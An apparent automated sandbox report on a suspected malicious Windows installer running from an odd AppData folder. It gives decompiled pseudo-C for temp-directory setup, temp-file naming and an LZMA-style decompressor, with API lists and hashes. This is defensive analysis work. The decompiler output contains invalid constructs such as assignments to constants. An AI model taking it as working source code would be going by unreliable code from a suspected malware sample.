					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

nsa, xrefs: 00405797
"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" , xrefs: 00405792
C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-289564233
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x754434
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Strings

4Du, xrefs: 00401392

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend
String ID: 4Du
API String ID: 3850602802-1750703084
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

1033, xrefs: 00403219
C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
